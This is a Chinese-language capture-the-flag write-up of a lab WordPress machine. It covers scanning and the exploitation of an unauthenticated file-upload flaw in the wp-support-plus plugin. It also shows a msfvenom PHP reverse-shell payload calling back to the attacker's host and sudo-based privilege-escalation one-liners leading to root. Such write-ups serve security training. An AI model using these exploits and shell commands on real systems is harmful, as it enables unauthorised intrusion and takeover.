题目描述
desc.png
解题记录
Reconnaissance
arp-scan 扫描,实验环境是192.168.1.15
└─# arp-scan -I eth1 -l
Interface: eth1, type: EN10MB, MAC: 00:0c:29:31:9f:9e, IPv4: 192.168.1.2
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.4 00:0c:29:89:d8:75 VMware, Inc.
192.168.1.11 00:0c:29:f5:d9:ad VMware, Inc.
192.168.1.13 00:0c:29:08:69:1e VMware, Inc.
192.168.1.14 00:0c:29:66:11:38 VMware, Inc.
192.168.1.15 00:0c:29:78:c9:04 VMware, Inc.
192.168.1.16 00:0c:29:c1:cc:cc VMware, Inc.
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.950 seconds (131.28 hosts/sec). 6 responded
nmap 扫描服务
nmap -sS -sV -A 192.168.1.15
└─# nmap -sS -sV -A 192.168.1.15
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-24 21:29 PST
Nmap scan report for 192.168.1.15
Host is up (0.00015s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
3306/tcp open mysql MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.18-MariaDB-0+deb10u1
| Thread ID: 167
| Capabilities flags: 63486
| Some Capabilities: InteractiveClient, FoundRows, Speaks41ProtocolOld, IgnoreSigpipes, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, SupportsTransactions, Support41Auth, ODBCClient, SupportsCompression, LongColumnFlag, SupportsLoadDataLocal, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: u@~zl/DGv>n4U.(zTpZR
|_ Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:78:C9:04 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.15 ms 192.168.1.15
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.34 seconds
根据扫描结果可知,开启了80和3306端口
dirb进行目录爆破
dirb http://192.168.1.15/
dirbresult.png
没有发现什么关键页面,直接访问http://192.168.1.15/index.html,页面如下。
dirb http://192.168.1.15/g@web
gweb.png
发现一个路径g@web,继续对http://192.168.1.15/g@web进行爆破。发现这是一个wordpress站点。
访问http://192.168.1.15/g@web/wp-login.php页面返回如下。
wp.png
一般遇到wp站点就是两个思路
- 暴力破解用户名密码
- 通过WP版本,或者指定插件极其版本获取shell
用wpscan扫描用户
wpscan --url http://192.168.1.15/g@web -e u
找到用户wp-local和一个urlhttp://192.168.1.15/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1,直接访问
users.png
发现疑似密码的可以字符串
secret.png
尝试使用wp-local和hackNos@9012!!尝试登陆,发现登陆失败。
f.png
下面尝试从插件漏洞入手,这里使用wpscan枚举插件,常用参数是ap和vp分别是列出所有插件和列出有漏洞的插件。
ap.png
wpscan --url http://192.168.1.15/g@web -e ap
all_plugins.png
找到插件wp-support-plus-responsive-ticket-system,对应版本7.1.3.
在wpscan.com查找插件漏洞。找到一个RCE漏洞,版本符合要求。
rce.png
Execution
漏洞利用方式明确给出,按照步骤完成即可,使用msfvenom生成shell。
description.png
<form method="post" enctype="multipart/form-data" action="http://192.168.1.15/g@web/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="wpsp_upload_attachment">
Choose a file ending with .phtml:
<input type="file" name="0">
<input type="submit" value="Submit">
</form>
wp_poc.png
生成shell并上传
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.2 lport=1234 -o vh_shell.phtml
upload.png
上传成功
success.png
找到木马文件路径并执行。
http://192.168.1.15/g@web/wp-content/uploads/wpsp/
打开msf
reverse_shell.png
拿到一个shell
python_shell.png
Privilege Escalation
切换到/home路径下,发现又三个用户,也可以查看/etc/passwd文件
3users.png
etc.png
对三个账户依次尝试密码hackNos@9012!!,发现security登陆成功
security.png
sudo查看无密码命令:
sudo -l
sudo.png
推荐一个可以查询提权命令的网站GTFOBins
gtfobins.png
这里使用find提权到hackNos-boat用户
sudo -u hackNos-boat find . -exec /bin/sh \; -quit
find_result.png
继续使用sudo -l提权
sudol.png
查找ruby提权命令
sudo -u hunter ruby -e 'exec "/bin/sh"'
提权至hunter
ruby.png
hunter_result.png
继续sudo -l提权
gcc.png
sudo gcc -wrapper /bin/sh,-s .
gcc_result.png
这时提权至root,查看flag
flag.png
网友评论